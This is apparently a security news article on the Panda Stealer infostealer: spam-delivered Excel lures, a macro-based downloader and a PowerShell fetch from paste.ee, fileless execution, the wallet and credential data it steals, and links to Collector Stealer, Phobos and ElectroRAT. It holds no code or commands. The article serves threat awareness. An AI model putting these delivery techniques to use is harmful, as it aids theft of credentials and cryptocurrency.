Security researchers recently observed a new information stealer (infostealer) malware. Called Panda Stealer, the malware is distributed via spam emails mostly in the US, Australia, Japan, and Germany. Trend Micro’s research shows that Panda Stealer is also utilizing fileless techniques to bypass detection mechanisms.
Panda Stealer’s infection chains
In terms of the campaign’s spam approaches, the malware operators are using luring business quote requests to trick their potential victims into executing malicious Excel files. The researchers have identified two infection chains:
- The first one is an .XSLM attachment that contains macros that download a loader which then downloads and executes Panda Stealer;
- The second one involves an attached .XLS file containing an Excel formula using a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command.
What kind of information is Panda Stealer after?
The malware is interested in data related to victims’ cryptocurrency wallets, including Dash, Bytecoin, Litecoin, and Ethereum:
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, it can steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards, the report says.
It is noteworthy that Panda Stealer shares similarities with another malware known as Collector Stealer and DC Stealer (which has been cracked). Collector Stealer has been offered for sale on an underground forum and on Telegram for $12. Advertised as a top-end information stealer, the threat has a Russian interface. Although similar in many ways, the two stealers have different command-and-control URLs and execution folders. However, both malware pieces exfiltrate details such as cookies, login and web data from victims, storing collected details in a SQLite3 database.
Another noteworthy discovery is that Panda Stealer has something in common with another malware in terms of its fileless distribution approaches. It has borrowed this feature from the so-called Fair variant of Phobos ransomware. Once the host is infected, the malware runs in memory rather than storing its files on the hard drive.
In January 2021, security researchers discovered ElectroRAT – a “wide-ranging operation targeting cryptocurrency users” on all major operating systems (Windows, macOS, and Linux).
The malicious operation was quite elaborate in its mechanism, consisting of a marketing campaign, custom applications related to cryptocurrencies, and an entirely new Remote Access Tool (RAT).